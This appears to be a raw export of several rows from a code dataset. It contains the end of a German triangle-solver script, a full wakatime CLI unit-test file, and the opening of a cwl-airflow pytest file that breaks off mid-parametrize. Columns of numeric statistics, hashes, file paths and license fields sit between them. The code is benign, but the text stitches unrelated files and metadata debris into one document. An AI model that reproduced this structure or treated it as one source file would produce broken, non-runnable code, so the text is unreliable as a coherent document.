                        return None  # no triangle matches the SSA data
                    ang = m.degrees(m.asin(sin_v))
                    if use_obtuse and sides[k] > sides[pair]:
                        ang = 180.0 - ang
                    angles[opp] = ang
        if (all(v > 0 for v in sides.values())
                and all(v > 0 for v in angles.values())):
            # Area from two sides and the included angle: A = ½·a·b·sin γ.
            area = 0.5 * sides["a"] * sides["b"] * m.sin(m.radians(angles["gamma"]))
            return sides, angles, area
    return None  # not enough information to complete the triangle


def _print_triangle(sides, angles, area, given_sides, given_angles, suffix=""):
    """Print every quantity the user did not supply, then the area."""
    for k in ("a", "b", "c"):
        if k not in given_sides:
            print(k + suffix + "=", sides[k])
    for k in ("alpha", "beta", "gamma"):
        if k not in given_angles:
            print(_GREEK[k] + suffix + "=", angles[k])
    print("A" + suffix + "=", area)


def main():
    """Run the interactive solve loop (endless, like the original script)."""
    print("***Nicht für schriftliche")
    print("Leistungsnachweise zulässig***")
    while True:
        print("---------------")
        print("Dreieck-Rechner")
        print("---------------")
        # Ask for the given variables; 0 marks a value as unknown.
        sides = {k: _read_float(k + "=") for k in ("a", "b", "c")}
        angles = {k: _read_float(_GREEK[k] + "=")
                  for k in ("alpha", "beta", "gamma")}
        given_sides = {k for k, v in sides.items() if v > 0}
        given_angles = {k for k, v in angles.items() if v > 0}
        print("---------------")
        if len(given_sides) + len(given_angles) < 3:
            print("Berechnung nicht möglich.")
            print("Es werden mindestens 3 Angaben benötigt.")
            continue
        if not given_sides:
            # Three angles fix the shape but not the size of the triangle.
            print("Berechnung nicht möglich.")
            print("Dreieck frei skalierbar.")
            continue
        first = solve_triangle(sides, angles)
        if first is None:
            print("Fehler in der Berechnung.")
            continue
        # Probe the obtuse SSA variant; if it yields the same angles the
        # triangle is unique and only one solution is printed.
        second = solve_triangle(sides, angles, use_obtuse=True)
        if second is not None and all(
                abs(second[1][k] - first[1][k]) < 1e-9 for k in angles):
            second = None
        if second is None:
            _print_triangle(*first, given_sides, given_angles)
        else:
            print("Dreieck 1")
            _print_triangle(*first, given_sides, given_angles)
            print("Dreieck 2")
            _print_triangle(*second, given_sides, given_angles, suffix="2")


if __name__ == "__main__":
    main()
| 41.09375
| 74
| 0.361417
| 2,969
| 24,985
| 3.041428
| 0.045807
| 0.066002
| 0.044297
| 0.039203
| 0.835437
| 0.816944
| 0.806866
| 0.79258
| 0.747841
| 0.713621
| 0
| 0.038821
| 0.481409
| 24,985
| 607
| 75
| 41.16145
| 0.6581
| 0.01625
| 0
| 0.798599
| 0
| 0
| 0.055825
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001751
| 0
| 0.001751
| 0.397548
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3bd75fca98539a3200164491e96e52f39cadb2f5
| 14,993
|
py
|
Python
|
Assets/MyAssets/WakaTime/client/tests/test_main.py
|
BillScott1024/WhiteBlocks
|
46c8373a4709c5a8a83a7b3da6b6bf7d3f9a37a5
|
[
"MIT"
] | null | null | null |
Assets/MyAssets/WakaTime/client/tests/test_main.py
|
BillScott1024/WhiteBlocks
|
46c8373a4709c5a8a83a7b3da6b6bf7d3f9a37a5
|
[
"MIT"
] | null | null | null |
Assets/MyAssets/WakaTime/client/tests/test_main.py
|
BillScott1024/WhiteBlocks
|
46c8373a4709c5a8a83a7b3da6b6bf7d3f9a37a5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from wakatime.main import execute
from wakatime.packages import requests
import os
import time
import sys
from wakatime.compat import u
from wakatime.packages.requests.models import Response
from . import utils
try:
from .packages import simplejson as json
except (ImportError, SyntaxError):
import json
try:
from mock import ANY
except ImportError:
from unittest.mock import ANY
class BaseTestCase(utils.TestCase):
    """End-to-end tests for wakatime.main.execute.

    The HTTP transport, the offline queue and the session cache are patched
    (see ``patch_these``), so every test drives the real argument parsing and
    heartbeat construction while asserting on the patched boundaries.

    Uses ``assertEqual`` instead of the deprecated ``assertEquals`` alias
    (removed in Python 3.12) and context managers for sample files so the
    handles are closed deterministically.
    """

    patch_these = [
        'wakatime.packages.requests.adapters.HTTPAdapter.send',
        'wakatime.offlinequeue.Queue.push',
        ['wakatime.offlinequeue.Queue.pop', None],
        'wakatime.session_cache.SessionCache.save',
        'wakatime.session_cache.SessionCache.delete',
        ['wakatime.session_cache.SessionCache.get', requests.session],
    ]

    def test_help_contents(self):
        """--help prints the stored help text to stdout and exits."""
        args = ['--help']
        with self.assertRaises(SystemExit):
            execute(args)
        with open('tests/samples/output/test_help_contents') as fh:
            expected_stdout = fh.read()
        self.assertEqual(sys.stdout.getvalue(), expected_stdout)
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

    def test_argument_parsing(self):
        """A valid --file/--key/--config invocation succeeds silently."""
        response = Response()
        response.status_code = 201
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
        entity = 'tests/samples/codefiles/twolinefile.txt'
        config = 'tests/samples/configs/sample.cfg'
        args = ['--file', entity, '--key', '123', '--config', config]
        retval = execute(args)
        self.assertEqual(retval, 0)
        self.assertEqual(sys.stdout.getvalue(), '')
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
        self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()

    def test_missing_config_file(self):
        """A nonexistent config file aborts with an error message."""
        config = 'foo'
        entity = 'tests/samples/codefiles/emptyfile.txt'
        args = ['--file', entity, '--config', config]
        with self.assertRaises(SystemExit):
            execute(args)
        expected_stdout = u("Error: Could not read from config file foo\n")
        with open('tests/samples/output/test_missing_config_file') as fh:
            expected_stderr = fh.read()
        self.assertEqual(sys.stdout.getvalue(), expected_stdout)
        self.assertEqual(sys.stderr.getvalue(), expected_stderr)
        self.patched['wakatime.session_cache.SessionCache.get'].assert_not_called()

    def test_config_file(self):
        """The API key may come from the config file instead of --key."""
        response = Response()
        response.status_code = 201
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
        entity = 'tests/samples/codefiles/emptyfile.txt'
        config = 'tests/samples/configs/sample.cfg'
        args = ['--file', entity, '--config', config]
        retval = execute(args)
        self.assertEqual(retval, 0)
        self.assertEqual(sys.stdout.getvalue(), '')
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
        self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()

    def test_bad_config_file(self):
        """An unparsable config file returns exit code 103 and reports the error."""
        entity = 'tests/samples/codefiles/emptyfile.txt'
        config = 'tests/samples/configs/bad_config.cfg'
        args = ['--file', entity, '--config', config]
        retval = execute(args)
        self.assertEqual(retval, 103)
        self.assertIn('ParsingError', sys.stdout.getvalue())
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
        self.patched['wakatime.session_cache.SessionCache.get'].assert_not_called()
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()

    def test_non_hidden_filename(self):
        """On API failure the heartbeat is queued with the real file path."""
        response = Response()
        response.status_code = 0
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
        now = u(int(time.time()))
        entity = 'tests/samples/codefiles/twolinefile.txt'
        config = 'tests/samples/configs/sample.cfg'
        args = ['--file', entity, '--key', '123', '--config', config, '--time', now]
        retval = execute(args)
        self.assertEqual(retval, 102)
        self.assertEqual(sys.stdout.getvalue(), '')
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
        heartbeat = {
            'language': 'Text only',
            'lines': 2,
            'entity': os.path.abspath(entity),
            'project': os.path.basename(os.path.abspath('.')),
            'branch': os.environ.get('TRAVIS_COMMIT', ANY),
            'time': float(now),
            'type': 'file',
        }
        stats = {
            u('cursorpos'): None,
            u('dependencies'): [],
            u('language'): u('Text only'),
            u('lineno'): None,
            u('lines'): 2,
        }
        self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(heartbeat, ANY, None)
        self.assertEqual(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

    def test_hidden_filename(self):
        """With a paranoid config the queued heartbeat hides the file name."""
        response = Response()
        response.status_code = 0
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
        now = u(int(time.time()))
        entity = 'tests/samples/codefiles/twolinefile.txt'
        config = 'tests/samples/configs/paranoid.cfg'
        args = ['--file', entity, '--key', '123', '--config', config, '--time', now]
        retval = execute(args)
        self.assertEqual(retval, 102)
        self.assertEqual(sys.stdout.getvalue(), '')
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
        heartbeat = {
            'language': 'Text only',
            'lines': 2,
            'entity': 'HIDDEN.txt',
            'project': os.path.basename(os.path.abspath('.')),
            'branch': os.environ.get('TRAVIS_COMMIT', ANY),
            'time': float(now),
            'type': 'file',
        }
        stats = {
            u('cursorpos'): None,
            u('dependencies'): [],
            u('language'): u('Text only'),
            u('lineno'): None,
            u('lines'): 2,
        }
        self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(heartbeat, ANY, None)
        self.assertEqual(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

    def test_500_response(self):
        """A 500 from the API queues the heartbeat for a later retry."""
        response = Response()
        response.status_code = 500
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
        now = u(int(time.time()))
        args = ['--file', 'tests/samples/codefiles/twolinefile.txt', '--key', '123',
                '--config', 'tests/samples/configs/paranoid.cfg', '--time', now]
        retval = execute(args)
        self.assertEqual(retval, 102)
        self.assertEqual(sys.stdout.getvalue(), '')
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
        heartbeat = {
            'language': 'Text only',
            'lines': 2,
            'entity': 'HIDDEN.txt',
            'project': os.path.basename(os.path.abspath('.')),
            'branch': os.environ.get('TRAVIS_COMMIT', ANY),
            'time': float(now),
            'type': 'file',
        }
        stats = {
            u('cursorpos'): None,
            u('dependencies'): [],
            u('language'): u('Text only'),
            u('lineno'): None,
            u('lines'): 2,
        }
        self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(heartbeat, ANY, None)
        self.assertEqual(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

    def test_400_response(self):
        """A 400 from the API is a client error: nothing is queued."""
        response = Response()
        response.status_code = 400
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
        now = u(int(time.time()))
        args = ['--file', 'tests/samples/codefiles/twolinefile.txt', '--key', '123',
                '--config', 'tests/samples/configs/paranoid.cfg', '--time', now]
        retval = execute(args)
        self.assertEqual(retval, 102)
        self.assertEqual(sys.stdout.getvalue(), '')
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
        self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

    def test_alternate_project(self):
        """--alternate-project does not override the auto-detected project."""
        response = Response()
        response.status_code = 0
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
        now = u(int(time.time()))
        entity = 'tests/samples/codefiles/twolinefile.txt'
        config = 'tests/samples/configs/sample.cfg'
        args = ['--file', entity, '--alternate-project', 'xyz', '--config', config, '--time', now]
        retval = execute(args)
        self.assertEqual(retval, 102)
        self.assertEqual(sys.stdout.getvalue(), '')
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
        heartbeat = {
            'language': 'Text only',
            'lines': 2,
            'entity': os.path.abspath(entity),
            'project': os.path.basename(os.path.abspath('.')),
            'branch': os.environ.get('TRAVIS_COMMIT', ANY),
            'time': float(now),
            'type': 'file',
        }
        stats = {
            u('cursorpos'): None,
            u('dependencies'): [],
            u('language'): u('Text only'),
            u('lineno'): None,
            u('lines'): 2,
        }
        self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(heartbeat, ANY, None)
        self.assertEqual(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

    def test_set_project_from_command_line(self):
        """--project overrides the auto-detected project name."""
        response = Response()
        response.status_code = 0
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
        now = u(int(time.time()))
        entity = 'tests/samples/codefiles/twolinefile.txt'
        config = 'tests/samples/configs/sample.cfg'
        args = ['--file', entity, '--project', 'xyz', '--config', config, '--time', now]
        retval = execute(args)
        self.assertEqual(retval, 102)
        self.assertEqual(sys.stdout.getvalue(), '')
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
        heartbeat = {
            'language': 'Text only',
            'lines': 2,
            'entity': os.path.abspath(entity),
            'project': 'xyz',
            'branch': os.environ.get('TRAVIS_COMMIT', ANY),
            'time': float(now),
            'type': 'file',
        }
        stats = {
            u('cursorpos'): None,
            u('dependencies'): [],
            u('language'): u('Text only'),
            u('lineno'): None,
            u('lines'): 2,
        }
        self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(heartbeat, ANY, None)
        self.assertEqual(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

    def test_missing_entity_file(self):
        """A missing source file is a silent no-op success."""
        response = Response()
        response.status_code = 201
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
        entity = 'tests/samples/codefiles/missingfile.txt'
        config = 'tests/samples/configs/sample.cfg'
        args = ['--file', entity, '--config', config]
        retval = execute(args)
        self.assertEqual(retval, 0)
        self.assertEqual(sys.stdout.getvalue(), '')
        self.assertEqual(sys.stderr.getvalue(), '')
        self.patched['wakatime.session_cache.SessionCache.get'].assert_not_called()
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
        self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
| 41.763231
| 110
| 0.639699
| 1,633
| 14,993
| 5.730557
| 0.085119
| 0.077581
| 0.134003
| 0.116264
| 0.918679
| 0.8972
| 0.887155
| 0.877324
| 0.86557
| 0.86557
| 0
| 0.007197
| 0.212232
| 14,993
| 358
| 111
| 41.879888
| 0.785116
| 0.001401
| 0
| 0.786207
| 0
| 0
| 0.303474
| 0.241283
| 0
| 0
| 0
| 0
| 0.32069
| 1
| 0.041379
| false
| 0
| 0.048276
| 0
| 0.096552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3be1d6766eeb1da4e1209986cd295cd6f5db8976
| 106,692
|
py
|
Python
|
tests/test_cwl.py
|
mdrio/cwl-airflow
|
e78bd7269f8273115ecc622c1cf8e4487656fd5d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_cwl.py
|
mdrio/cwl-airflow
|
e78bd7269f8273115ecc622c1cf8e4487656fd5d
|
[
"Apache-2.0"
] | 2
|
2022-01-28T21:58:42.000Z
|
2022-03-01T23:11:44.000Z
|
tests/test_cwl.py
|
mdrio/cwl-airflow
|
e78bd7269f8273115ecc622c1cf8e4487656fd5d
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
import shutil
import pytest
import tempfile
import importlib
from ruamel.yaml.comments import CommentedMap
from cwltool.workflow import Workflow
from cwltool.command_line_tool import CommandLineTool
from schema_salad.exceptions import SchemaSaladException
from cwl_airflow.utilities.helpers import (
get_md5_sum,
get_absolute_path,
get_rootname,
get_compressed,
get_dir
)
from cwl_airflow.utilities.cwl import (
fast_cwl_load,
slow_cwl_load,
get_temp_folders,
load_job,
get_items,
get_short_id,
execute_workflow_step,
embed_all_runs,
convert_to_workflow,
get_default_cwl_args,
overwrite_deprecated_dag,
get_containers,
CWL_TMP_FOLDER,
CWL_INPUTS_FOLDER,
CWL_OUTPUTS_FOLDER,
CWL_PICKLE_FOLDER,
CWL_USE_CONTAINER,
CWL_NO_MATCH_USER,
CWL_SKIP_SCHEMAS,
CWL_STRICT,
CWL_QUIET,
CWL_RM_TMPDIR,
CWL_MOVE_OUTPUTS
)
# Location of the bundled test fixture data, resolved next to this test module.
DATA_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), "data"))
if sys.platform == "darwin": # docker has troubles of mounting /var/private on macOs
    tempfile.tempdir = "/private/tmp"
@pytest.mark.parametrize(
"task_id, cidfiles, control_containers",
[
(
"bam_to_bedgraph",
[
"dummy_1.cid",
"dummy_2.cid"
],
{
"43dd79ede44946a1954d27327000d1c013cb39196c096ce70bc158ee7531a557": "dummy_1.cid",
"000d1c013cb39196c096ce70bc158ee7531a55743dd79ede44946a1954d27327": "dummy_2.cid"
}
),
(
"bam_to_bedgraph",
[
"dummy_1.cid"
],
{
"43dd79ede44946a1954d27327000d1c013cb39196c096ce70bc158ee7531a557": "dummy_1.cid"
}
),
(
"bam_to_bedgraph",
[],
{}
)
]
)
def test_get_containers(task_id, cidfiles, control_containers, monkeypatch):
    """get_containers should map container ids to their cidfile locations.

    Copies the fixture cidfiles into a throwaway HOME, calls
    get_containers with that folder as "tmp_folder" and compares the
    result against control_containers resolved to absolute paths.
    """
    temp_home = tempfile.mkdtemp()
    # Isolate Airflow from the user's real configuration
    monkeypatch.delenv("AIRFLOW_HOME", raising=False)
    monkeypatch.delenv("AIRFLOW_CONFIG", raising=False)
    monkeypatch.setattr(
        os.path,
        "expanduser",
        lambda x: x.replace("~", temp_home)
    )
    for cidfile in cidfiles:
        shutil.copy(
            os.path.join(DATA_FOLDER, "cid", cidfile),
            get_dir(os.path.join(temp_home, task_id))
        )
    try:
        containers = get_containers({"tmp_folder": temp_home}, task_id)
        # Resolve control filenames to absolute paths inside temp_home
        control_containers = {
            cid: os.path.join(temp_home, task_id, filename)
            for cid, filename in control_containers.items()
        }
    except BaseException as err:  # was "(BaseException, Exception)" — Exception is already a BaseException subclass
        assert False, f"Failed to run test. \n {err}"
    finally:
        shutil.rmtree(temp_home)
    assert control_containers == containers, \
        "Failed to find cidfiles"
@pytest.mark.parametrize(
"dag_location, workflow_location, control_deprecated_files",
[
(
os.path.join(DATA_FOLDER, "dags", "bam_bedgraph_bigwig_single_old_format.py"),
os.path.join(DATA_FOLDER, "workflows", "bam-bedgraph-bigwig-single.cwl"), # need it only to run test
["bam_bedgraph_bigwig_single_old_format.py", ".airflowignore"]
)
]
)
def test_overwrite_deprecated_dag(
    dag_location,
    workflow_location,
    control_deprecated_files,
    monkeypatch
):
    """Old-style DAG should be rewritten in place and backed up.

    overwrite_deprecated_dag is expected to move the original DAG into
    deprecated_dags_folder (producing the files listed in
    control_deprecated_files, including .airflowignore) and leave an
    importable replacement at dag_location.
    """
    temp_home = tempfile.mkdtemp()
    # Isolate Airflow from the user's real configuration
    monkeypatch.delenv("AIRFLOW_HOME", raising=False)
    monkeypatch.delenv("AIRFLOW_CONFIG", raising=False)
    monkeypatch.setattr(
        os.path,
        "expanduser",
        lambda x: x.replace("~", temp_home)
    )
    dags_folder = get_dir(
        os.path.join(temp_home, "airflow", "dags")
    )
    # Work on copies so the fixture files stay untouched
    dag_location = shutil.copy(
        dag_location,
        os.path.join(
            dags_folder,
            os.path.basename(dag_location)
        )
    )
    workflow_location = shutil.copy(
        workflow_location,
        os.path.join(
            dags_folder,
            os.path.basename(workflow_location)
        )
    )
    deprecated_dags_folder = os.path.join(dags_folder, "deprecated_dags")
    try:
        overwrite_deprecated_dag(
            dag_location=dag_location,
            deprecated_dags_folder=deprecated_dags_folder
        )
        os.remove(workflow_location)  # remove workflow file to make sure we are loading compressed workflow content
        # Import the rewritten DAG module to prove it is still valid Python
        spec = importlib.util.spec_from_file_location(
            get_rootname(dag_location),
            dag_location
        )
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
        deprecated_dags_folder_content = os.listdir(deprecated_dags_folder)
        with open(
            os.path.join(deprecated_dags_folder, ".airflowignore")
        ) as input_stream:
            airflowignore_content = input_stream.read()
    except (BaseException, Exception) as err:
        assert False, f"Failed to run test. \n {err}"
    finally:
        shutil.rmtree(temp_home)
    assert all(
        deprecated_file in deprecated_dags_folder_content
        for deprecated_file in control_deprecated_files
    ), "Failed to backup DAGs"
    assert control_deprecated_files[0] in airflowignore_content, \
        "Failed to update .airflowignore"
@pytest.mark.parametrize(
"workflow, job, skipped_control",
[
(
["tools", "bedtools-genomecov.cwl"],
"bedtools-genomecov.json",
False
),
(
["tools", "linux-sort.cwl"],
"linux-sort.json",
False
),
(
["tools", "ucsc-bedgraphtobigwig.cwl"],
"ucsc-bedgraphtobigwig.json",
False
)
]
)
def test_convert_to_workflow(workflow, job, skipped_control):
    """CommandLineTool converted to a Workflow should still execute.

    Loads the tool, wraps it into a single-step workflow with
    convert_to_workflow, then executes that step and checks the
    reported "skipped" flag against skipped_control.
    """
    pickle_folder = tempfile.mkdtemp()
    command_line_tool = slow_cwl_load(
        workflow=os.path.join(DATA_FOLDER, *workflow),  # PEP 8: no spaces around "=" in keyword arguments
        only_tool=True
    )
    converted_workflow_path = os.path.join(pickle_folder, "workflow.cwl")
    workflow_tool = convert_to_workflow(
        command_line_tool=command_line_tool,
        location=converted_workflow_path
    )
    try:
        job_data = load_job(
            workflow=converted_workflow_path,
            job=os.path.join(DATA_FOLDER, "jobs", job),
            cwl_args={"pickle_folder": pickle_folder}
        )
        job_data["tmp_folder"] = pickle_folder
        step_outputs, step_report, skipped = execute_workflow_step(
            workflow=converted_workflow_path,
            task_id=get_rootname(command_line_tool["id"]),
            job_data=job_data,
            cwl_args={"pickle_folder": pickle_folder}
        )
        if skipped != skipped_control:
            raise ValueError("Workflow didn't follow skipping rule")
    except ValueError as err:
        assert False, f"Failed to execute the workflow. \n {err}"
    except BaseException as err:
        assert False, f"Failed to run the test. \n {err}"
    finally:
        shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"control_defaults",
[
(
{
"tmp_folder": CWL_TMP_FOLDER,
"inputs_folder": CWL_INPUTS_FOLDER,
"outputs_folder": CWL_OUTPUTS_FOLDER,
"pickle_folder": CWL_PICKLE_FOLDER,
"use_container": CWL_USE_CONTAINER,
"no_match_user": CWL_NO_MATCH_USER,
"skip_schemas": CWL_SKIP_SCHEMAS,
"strict": CWL_STRICT,
"quiet": CWL_QUIET,
"rm_tmpdir": CWL_RM_TMPDIR,
"move_outputs": CWL_MOVE_OUTPUTS
}
)
]
)
def test_get_default_cwl_args(monkeypatch, control_defaults):
    """get_default_cwl_args should return the module-level CWL_* defaults."""
    temp_home = tempfile.mkdtemp()
    # Isolate Airflow from the user's real configuration
    monkeypatch.delenv("AIRFLOW_HOME", raising=False)
    monkeypatch.delenv("AIRFLOW_CONFIG", raising=False)
    monkeypatch.setattr(
        os.path,
        "expanduser",
        lambda x: x.replace("~", temp_home)
    )
    try:
        required_cwl_args = get_default_cwl_args()
    except BaseException as err:  # was "(BaseException, Exception)" — Exception is already a BaseException subclass
        assert False, f"Failed to run test. \n {err}"
    finally:
        shutil.rmtree(temp_home)
    assert all(
        required_cwl_args[key] == control_value  # fixed "contol_value" typo
        for key, control_value in control_defaults.items()
    ), "Failed to set proper defaults"
@pytest.mark.parametrize(
"workflow, job, task_id, skipped_control",
[
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig-single.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig-subworkflow.cwl"],
"bam-bedgraph-bigwig.json",
"subworkflow",
False
)
]
)
def test_embed_all_runs(workflow, job, task_id, skipped_control):
    """Workflow with embedded (packed) "run" sections should still execute.

    Packs the workflow with embed_all_runs, then runs task_id from the
    packed copy and compares the "skipped" flag with skipped_control.
    """
    pickle_folder = tempfile.mkdtemp()
    packed_workflow_path = os.path.join(pickle_folder, "packed.cwl")
    embed_all_runs(
        workflow_tool=slow_cwl_load(
            workflow=os.path.join(DATA_FOLDER, *workflow),  # PEP 8: no spaces around "=" in keyword arguments
            only_tool=True
        ),
        location=packed_workflow_path
    )
    try:
        job_data = load_job(
            workflow=packed_workflow_path,
            job=os.path.join(DATA_FOLDER, "jobs", job),
            cwl_args={"pickle_folder": pickle_folder}
        )
        job_data["tmp_folder"] = pickle_folder
        step_outputs, step_report, skipped = execute_workflow_step(
            workflow=packed_workflow_path,
            task_id=task_id,
            job_data=job_data,
            cwl_args={"pickle_folder": pickle_folder}
        )
        if skipped != skipped_control:
            raise ValueError("Workflow didn't follow skipping rule")
    except ValueError as err:
        assert False, f"Failed to execute the workflow. \n {err}"
    except BaseException as err:
        assert False, f"Failed to run the test. \n {err}"
    finally:
        shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"long_id, only_step_name, only_id, control",
[
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/output_filename",
None,
None,
"sorted_bedgraph_to_bigwig/output_filename"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/output_filename",
True,
None,
"sorted_bedgraph_to_bigwig"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/output_filename",
None,
True,
"output_filename"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/output_filename",
True,
True,
""
),
(
"sorted_bedgraph_to_bigwig/output_filename",
None,
None,
"sorted_bedgraph_to_bigwig/output_filename"
),
(
"sorted_bedgraph_to_bigwig/output_filename",
True,
None,
"sorted_bedgraph_to_bigwig"
),
(
"sorted_bedgraph_to_bigwig/output_filename",
None,
True,
"output_filename"
),
(
"sorted_bedgraph_to_bigwig/output_filename",
True,
True,
""
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig-single.cwl#bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
None,
"bam_to_bedgraph/genome_coverage_file"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig-single.cwl#bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
None,
"bam_to_bedgraph"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig-single.cwl#bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
True,
"genome_coverage_file"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig-single.cwl#bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
True,
""
),
(
"bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
None,
"bam_to_bedgraph/genome_coverage_file"
),
(
"bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
None,
"bam_to_bedgraph"
),
(
